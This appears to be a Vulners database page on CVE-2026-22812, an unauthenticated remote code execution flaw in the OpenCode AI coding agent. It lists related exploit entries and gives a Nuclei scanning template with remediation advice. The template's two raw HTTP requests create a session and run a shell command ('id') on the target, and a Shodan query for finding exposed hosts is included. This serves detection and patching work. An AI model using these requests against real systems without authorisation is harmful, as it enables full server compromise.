| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
| Exploit for CVE-2026-22812 | 20 Jan 202612:29 | – | githubexploit | |
| mirai-exploit | 20 Apr 202606:55 | – | githubexploit | |
| Exploit for CVE-2026-22812 | 19 Jan 202604:52 | – | githubexploit | |
| Ntemplatesbyxit | 7 May 202615:36 | – | githubexploit | |
| Exploit for CVE-2026-22812 | 18 Jan 202609:11 | – | githubexploit | |
| Exploit for CVE-2026-22812 | 19 Jan 202621:20 | – | githubexploit | |
| The vulnerability of the OpenCode artificial intelligence-based software development agent lies in the lack of authentication for a critical function, allowing attackers to execute arbitrary code. | 23 Jan 202600:00 | – | bdu_fstec | |
| CVE-2026-22812 | 12 Jan 202619:43 | – | circl | |
| opencode 安全漏洞 | 12 Jan 202600:00 | – | cnnvd | |
| CVE-2026-22812 | 12 Jan 202622:49 | – | cve |
id: CVE-2026-22812
info:
name: OpenCode < 1.0.216 - Unauthenticated Remote Code Execution
author: princechaddha
severity: high
description: |
OpenCode versions prior to 1.0.216 contain an unauthenticated remote code execution vulnerability. The application exposes session and shell execution endpoints without proper authentication, allowing remote attackers to create sessions and execute arbitrary shell commands on the underlying server.
impact: |
Unauthenticated attackers can execute arbitrary commands on the server, potentially leading to full system compromise.
remediation: |
Upgrade OpenCode to version 1.0.216 or later.
reference:
- https://github.com/rohmatariow/CVE-2026-22812-exploit
- https://nvd.nist.gov/vuln/detail/CVE-2026-22812
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2026-22812
epss-score: 0.16955
epss-percentile: 0.96689
cwe-id: CWE-306
metadata:
verified: true
max-request: 2
vendor: opencode
product: opencode
shodan-query: http.html:"opencode"
tags: cve,cve2026,opencode,rce,unauth
flow: http(1) && http(2)
http:
- raw:
- |
POST /session HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
extractors:
- type: json
name: session_id
json:
- '.id'
internal: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "id")'
condition: and
internal: true
- raw:
- |
POST /session/{{session_id}}/shell HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"agent":"build","command":"id"}
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 201 || status_code == 202'
- 'regex("uid=\\d+\\([^)]+\\) gid=\\d+\\([^)]+\\)", body)'
condition: and
extractors:
- type: regex
regex:
- 'uid=\d+\([^)]+\) gid=\d+\([^)]+\)'
# digest: 4a0a00473045022042bba0c333940b5cddacf60ecd5f578430b9de4b5e7795cb36e97bb29fbdbf5d022100b0df702fe3dea44cbc4122787215f3f9df87458fb4e5b3facae560998e759c6d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation